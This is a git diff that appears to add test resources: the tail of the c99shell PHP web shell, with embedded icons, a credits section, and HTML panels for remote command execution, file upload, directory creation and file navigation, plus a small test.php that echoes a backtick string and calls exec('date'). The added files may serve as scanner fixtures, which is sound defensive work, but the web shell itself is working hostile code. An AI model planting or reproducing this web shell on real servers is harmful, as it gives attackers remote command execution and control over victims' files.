+"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo".
+"GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7",
+"ext_swf"=>
+"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O".
+"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
+"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA".
+"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC".
+"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=",
+"ext_tar"=>
+"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC".
+"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF".
+"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD".
+"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p".
+"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg".
+"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd".
+"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB".
+"u4tLAgEAOw==",
+"ext_txt"=>
+"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ".
+"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7".
+"UpPWG3Ig6Hq/XmRjuZwkAAA7",
+"ext_wri"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".
+"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=",
+"ext_xml"=>
+"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA".
+"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx".
+"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ".
+"IQA7"
+ );
+ //For simple size- and speed-optimization.
+ $imgequals = array(
+  "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
+  "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"),
+  "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"),
+  "ext_html"=>array("ext_html","ext_htm"),
+  "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"),
+  "ext_lnk"=>array("ext_lnk","ext_url"),
+  "ext_ini"=>array("ext_ini","ext_css","ext_inf"),
+  "ext_doc"=>array("ext_doc","ext_dot"),
+  "ext_js"=>array("ext_js","ext_vbs"),
+  "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"),
+  "ext_wri"=>array("ext_wri","ext_rtf"),
+  "ext_swf"=>array("ext_swf","ext_fla"),
+  "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"),
+  "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so")
+ );
+ if (!$getall)
+ {
+  header("Content-type: image/gif");
+  header("Cache-control: public");
+  header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+  header("Cache-control: max-age=".(60*60*24*7));
+  header("Last-Modified: ".date("r",filemtime(__FILE__)));
+  foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}}
+  if (empty($images[$img])) {$img = "small_unk";}
+  if (in_array($img,$ext_tar)) {$img = "ext_tar";}
+  echo base64_decode($images[$img]);
+ }
+ else
+ {
+  foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}}
+  natsort($images);
+  $k = array_keys($images);
+  echo  "<center>";
+  foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";}
+  echo "</center>";
+ }
+ exit;
+}
+if ($act == "about") {echo "<center><b>Credits:<br>Idea, leading and coding by tristram[CCTeaM].<br>Beta-testing and some tips - NukLeoN [AnTiSh@Re tEaM].<br>Thanks all who report bugs.<br>All bugs send to tristram's ICQ #656555 <a href=\"http://wwp.icq.com/scripts/contact.dll?msgto=656555\"><img src=\"http://wwp.icq.com/scripts/online.dll?icq=656555&img=5\" border=0 align=absmiddle></a>.</b>";}
+?>
+</td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr><td width="100%" height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Command execute</b></a> ::</b></p></td></tr>
+<tr><td width="50%" height="1" valign="top"><center><b>Enter: </b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td><td width="50%" height="1" valign="top"><center><b>Select: </b><form action="<?php echo $surl; ?>act=cmd" method="POST"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><select name="cmd"><?php foreach ($cmdaliases as $als) {echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";} ?></select><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td></tr></TABLE>
+<br>
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr>
+ <td width="50%" height="1" valign="top"><center><b>:: <a href="<?php echo $surl; ?>act=search&d=<?php echo urlencode($d); ?>"><b>Search</b></a> ::</b><form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="search_name" size="29" value="(.*)">&nbsp;<input type="checkbox" name="search_name_regexp" value="1"  checked> - regexp&nbsp;<input type=submit name=submit value="Search"></form></center></p></td>
+ <td width="50%" height="1" valign="top"><center><b>:: <a href="<?php echo $surl; ?>act=upload&d=<?php echo $ud; ?>"><b>Upload</b></a> ::</b><form method="POST" ENCTYPE="multipart/form-data"><input type=hidden name=act value="upload"><input type="file" name="uploadfile"><input type=hidden name="miniform" value="1">&nbsp;<input type=submit name=submit value="Upload"><br><?php echo $wdt; ?></form></center></td>
+</tr>
+</table>
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Make Dir ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Make File ::</b><form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td></tr></table>
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Go Dir ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Go File ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="f" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td></tr></table>
+<br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="990" height="1" valign="top"><p align="center"><b>--[ c99shell v. <?php echo $shver; ?> <a href="<?php echo $surl; ?>act=about"><u><b>powered by</b></u></a> Captain Crunch Security Team | <a href="http://ccteam.ru"><font color="#FF0000">http://ccteam.ru</font></a><font color="#FF0000"></font> | Generation time: <?php echo round(getmicrotime()-starttime,4); ?> ]--</b></p></td></tr></table>
+</body></html><?php chdir($lastdir); c99shexit(); ?>
diff --git a/tests/res/test.php b/tests/res/test.php
new file mode 100644
index 0000000000000000000000000000000000000000..4713678a5e3cfa6090105f520ac6eaa5fdac6836
--- /dev/null
+++ b/tests/res/test.php
@@ -0,0 +1,10 @@
+<?php
+
+function test()
+{
+    echo "ok";
+}
+$Æ = "test";
+echo $Æ;
+echo "ls -\`al\`";
+exec("date");